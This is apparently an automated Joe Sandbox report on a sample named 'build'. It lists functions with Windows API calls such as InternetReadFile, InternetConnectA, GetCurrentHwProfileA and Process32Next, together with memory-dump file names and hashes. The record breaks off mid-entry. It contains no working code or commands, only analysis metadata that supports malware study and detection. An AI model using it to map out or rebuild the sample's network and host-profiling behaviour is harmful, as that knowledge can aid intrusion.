
Function 0041FE65 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32 ref: 0041FE9F

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 7e85817e22f138c02c453e3c8736ecf73058679fe76b3fc0f0587abf6011d14e
Instruction ID: 05a1160b0d36b77b328343130d452bea134fcae93cfb3c47e4085434c63e978c
Opcode Fuzzy Hash: 7e85817e22f138c02c453e3c8736ecf73058679fe76b3fc0f0587abf6011d14e
Instruction Fuzzy Hash: 51F08270A183459FDB08DF29C894569B7E1BFC8314F14C92EE89A47354F770A885CB86

Function 00413263 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNELBASE(?,?), ref: 00413298

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 15c4ffbb12baafcaac6dc899ca935e25643eb30cf0bd71265adac321ad7158ee
Instruction ID: c6d18ff3661babe7afd2bf8597fec0b91fd64dfa3a206f198322a9390ae50d2e
Opcode Fuzzy Hash: 15c4ffbb12baafcaac6dc899ca935e25643eb30cf0bd71265adac321ad7158ee
Instruction Fuzzy Hash: 2DF01CB6B4010A8BCB05CB58DD91BDC33B5EF58204F140128D909D7261EA31BE158F54

Function 0042C391 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 0042C39D

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 011e9bd8fc71e4e42e049cef734956ce052094584bd460ef50def60e2692713a
Instruction ID: 6d828852da939186bf56a3799f9f6520df9f02f76987a01fc32ecadda15bd6d6
Opcode Fuzzy Hash: 011e9bd8fc71e4e42e049cef734956ce052094584bd460ef50def60e2692713a
Instruction Fuzzy Hash: FAE09276B801049BE315C789EC90F7973A6AFC9300F6940399616C73D2CE74AC05876C

Function 00409580 Relevance: 1.5, APIs: 1, Instructions: 23filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000FFF,?), ref: 004095AA

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 0b13a4c9756e6dbc5a3b479240f144414e6dfb9d172209e6f6427846867f8471
Instruction ID: 282d77582df1dc03db1effc52c008eafb25d4b73df9bbd85ee4dda3fdaa0c12f
Opcode Fuzzy Hash: 0b13a4c9756e6dbc5a3b479240f144414e6dfb9d172209e6f6427846867f8471
Instruction Fuzzy Hash: 41E0DF7A344001EFC384CB5CDC85EAA33E9AF842047180579B80AC73A2EB70ED19CB08

Function 0040C924 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

PathFileExistsA.SHLWAPI(00000000), ref: 0040C94F

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 20f0f2f987cdd6fd5d78be4d92f2ad059cd5cf2e3368b0de4e59f1860672bcd1
Instruction ID: a0ac7273f53d20d96c15c6bff5cc153122d5beba8fb7721ef6fb638b5fbe53e8
Opcode Fuzzy Hash: 20f0f2f987cdd6fd5d78be4d92f2ad059cd5cf2e3368b0de4e59f1860672bcd1
Instruction Fuzzy Hash: 40E09276B002058FC788FB9CDCE4F6933E4EB46204B04003C9906D3351DA289D16CB48

Function 00407751 Relevance: 1.5, APIs: 1, Instructions: 22networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET ref: 00407787

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: ConnectInternet
String ID:
API String ID: 3050416762-0
Opcode ID: b95de7b108c177cff31b336e0a3386d780ae9b85be1aeec919afe5d5e6169278
Instruction ID: 1446014fd0c9d4017d764f9b938a641aa2b32dcb309b268e3664a91dcaf54a16
Opcode Fuzzy Hash: b95de7b108c177cff31b336e0a3386d780ae9b85be1aeec919afe5d5e6169278
Instruction Fuzzy Hash: 62F0A034E093418BC314CF69D54062AB7F2BFD9305F15C62DE85887364EA309C91CF41

Function 00422B74 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExA.KERNEL32(?,00000000,?,00000104), ref: 00422B84

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 52b15660bd697938981da5ee73889311184e970823131d8a2279e521e5bee4fd
Instruction ID: 69e6cde24125f6890367141ee933c78470dc6f28d39b691ac87247349ccaad8d
Opcode Fuzzy Hash: 52b15660bd697938981da5ee73889311184e970823131d8a2279e521e5bee4fd
Instruction Fuzzy Hash: ABD05E763801082BE600F74FFCC1FBA33A8FB83ABCF080035F288C3280C559A8994169

Function 00421B88 Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000008), ref: 00421BA2

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 793ce0ae4f8bb3d1bb642a415763f876b6cd25f1444373563aa98e422428ced6
Instruction ID: 026f7c298e305e7d7ce455381b0712138cb142cdf70c581b58335424dd276684
Opcode Fuzzy Hash: 793ce0ae4f8bb3d1bb642a415763f876b6cd25f1444373563aa98e422428ced6
Instruction Fuzzy Hash: C2E0DF756002028BC304CF69DC90E1A33E4FF85310B05007DA801D3361CB34EC45CB88

Function 0040C975 Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 0040C9A9

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3fb8d76a0d4f9672b6b9978df7dcd38b4171413283df2e9b1cfd581a8d4a8782
Instruction ID: 79fb95547d5fdbe54a16516f1546399437a45ab7f8c97ea9a6881ddec385e781
Opcode Fuzzy Hash: 3fb8d76a0d4f9672b6b9978df7dcd38b4171413283df2e9b1cfd581a8d4a8782
Instruction Fuzzy Hash: 46F03971944241CBE740EF6CEC8476977F0FB94314F14462CE894D72A1DB7499998B4A

Function 0040CAD1 Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040CAEC

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1fe233bd45b73fb4e76dadc43ffb76967d15a1422c2845191ef2c301cb6acfbd
Instruction ID: 8f33944eb265aadd8b99b5613bb51d2a6a1012877fb87abd0653211fac53b3bf
Opcode Fuzzy Hash: 1fe233bd45b73fb4e76dadc43ffb76967d15a1422c2845191ef2c301cb6acfbd
Instruction Fuzzy Hash: CFE04870B412069FC704EFA5CD84F96B7B6FF84644F548568D401D7159EA719806C794

Function 00421992 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 004219B0

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 6ad2aecadb6b92fef9065b430b3f00a23771f5bd5df6e859b6afbc5f368a2d2c
Instruction ID: 1cc98b9c078abeda64e2b049747d0090427da3c271b2c9e07a9196400bb093bd
Opcode Fuzzy Hash: 6ad2aecadb6b92fef9065b430b3f00a23771f5bd5df6e859b6afbc5f368a2d2c
Instruction Fuzzy Hash: 88E0C2BF2002509FC310CB6ADC4085E772BFBC223032E0518E421D33E0D638E9028AA8

Function 0040BD53 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040BD73

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 24114e56f6486e8bfd70d2abaa09d7b493a70cea7421b2c08c96600f2418ed62
Instruction ID: 7de03404172e5aabe1c443ce8fe071b09326cd08ca7e4df849f82930eaead7d2
Opcode Fuzzy Hash: 24114e56f6486e8bfd70d2abaa09d7b493a70cea7421b2c08c96600f2418ed62
Instruction Fuzzy Hash: 1BE0467A280301AFEB04DF50CCC0F2AB372FB8A720B14C058EC008B266E734E811AF60

Function 0041EFEF Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 0041F011

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 1bb8bf45926aeb78dc0df2a22b1925beb13621fe846422212df0629430937606
Instruction ID: 8b1b12d0e7ad679d432470b63cf508538332a85973f9a3fcf61e176a271b0cc5
Opcode Fuzzy Hash: 1bb8bf45926aeb78dc0df2a22b1925beb13621fe846422212df0629430937606
Instruction Fuzzy Hash: 37E0C27A3002058BD324EF28DC90E9BB769AF97340F21842CBD4187351EA32EC088B91

Function 004070A7 Relevance: 1.5, APIs: 1, Instructions: 18filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,000000C7,?), ref: 004070C0

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 546b1b817affd0ba002faa5689473d396effbf13e0107113c382e3037954a148
Instruction ID: 087524e99e2e36aa6c24c0d744c8560dd19395c8f046e54837bd47bfdc5e2b69
Opcode Fuzzy Hash: 546b1b817affd0ba002faa5689473d396effbf13e0107113c382e3037954a148
Instruction Fuzzy Hash: 2DE012B6741111ABEB1CC764CC659BA7A66AF96280B24413CA41797AD0E631A901C651

Function 00406333 Relevance: 1.5, APIs: 1, Instructions: 18filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,000007CF,?), ref: 0040634C

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: b9918eb97e5bea99c1d356312d8d340aa729f123eee411683adfacc09c233fb8
Instruction ID: e80a74c448b2809dfa2cf42497063a6acbaa13e565d0bdd883d0bc87c2d4b46b
Opcode Fuzzy Hash: b9918eb97e5bea99c1d356312d8d340aa729f123eee411683adfacc09c233fb8
Instruction Fuzzy Hash: CAE08CB6B0020BEFEF08CF04CCD1E65B3BAAB8430472480289405DB399E671ED028B50

Function 00422384 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00422398

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: 626707349cb6978d03d3e19a4fb391f0d79e528f92faa6b35c17b36f3a53c805
Instruction ID: 7bdeb3cd2f91353ee1d3f4ce7728727f60221488556750a91bea947e3788f92e
Opcode Fuzzy Hash: 626707349cb6978d03d3e19a4fb391f0d79e528f92faa6b35c17b36f3a53c805
Instruction Fuzzy Hash: CBD05B753001025FF718CB59CC93F593356A755304F1C4524F602DB6D5E560D8028744

Function 00407913 Relevance: 1.5, APIs: 1, Instructions: 17filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,000007CF,?), ref: 0040792F

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 424e219dfdf8514739f52499651c48f9878a3e7104e72651a24c05815333082c
Instruction ID: 79d45554b27fa09bf4581156ee703008adca5f77a3fafbdbf00c8d7df8431c84
Opcode Fuzzy Hash: 424e219dfdf8514739f52499651c48f9878a3e7104e72651a24c05815333082c
Instruction Fuzzy Hash: 17E012B6B421569BEB18CB65DC91E9E337AEB56200B05802CA506A7250E930AD51CB90

Function 00404F86 Relevance: 1.5, APIs: 1, Instructions: 17filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,000007CF,?), ref: 00404F9F

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 571e24645761fac644e174942f847ef6c0013c5ba2d74888f91d1e860bba1106
Instruction ID: 2cce16e57b110384986bc3907c8539cc9eec47c1517a23192c1d69bd0d79c129
Opcode Fuzzy Hash: 571e24645761fac644e174942f847ef6c0013c5ba2d74888f91d1e860bba1106
Instruction Fuzzy Hash: C6E0C231B241119FD304EB94DC84D0677B6ABD57003048438A401DB358E231AD01CB40

Function 00420268 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32(?,?), ref: 0042027D

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: NextProcess32
String ID:
API String ID: 1850201408-0
Opcode ID: 3cf2509ff0fc67728fd6910ac9e61a6febb8140007dbc3dabbb60ed7bbd7c3ca
Instruction ID: 472f168c98467f6050b8b6ae28b630018f91697d413617e88336b4e14123bb41
Opcode Fuzzy Hash: 3cf2509ff0fc67728fd6910ac9e61a6febb8140007dbc3dabbb60ed7bbd7c3ca
Instruction Fuzzy Hash: 7CE017B67002419FDB0CDB58DCA1F6673E1B798200F04087CE916CB3A0FA39DC049B14

Function 00423646 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32 ref: 00423651

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: NextProcess32
String ID:
API String ID: 1850201408-0
Opcode ID: 9e0d8f383895cfcf800a0cf09e3caa25afbf4b03fc6cf6bd0753ab5c419e899c
Instruction ID: 9abe59a6ac43a9b84b513fa3df34008672bafd94d198bd606b6e833ccc4e43ac
Opcode Fuzzy Hash: 9e0d8f383895cfcf800a0cf09e3caa25afbf4b03fc6cf6bd0753ab5c419e899c
Instruction Fuzzy Hash: 20D05B34302111EB8314CF0DDD41D56B3E9AFC6249394856CE105CB346D779DE168B59

Function 0041EA84 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000), ref: 0041EA9C

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 096a9dc79444aaf94d6119c087f3401d22ba568a0a46fc9acbbc18c6c675be4d
Instruction ID: 73277cee66c1b014dba9bcdb22b7ebd6f2b23bbe4ef61520c965ad129f1238b5
Opcode Fuzzy Hash: 096a9dc79444aaf94d6119c087f3401d22ba568a0a46fc9acbbc18c6c675be4d
Instruction Fuzzy Hash: 27D0C9B67403025FD320EFBAECC0B86B7E4EB85711B144839A2A4C2211D238E0508718

Function 00409C5B Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 00409C6D

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
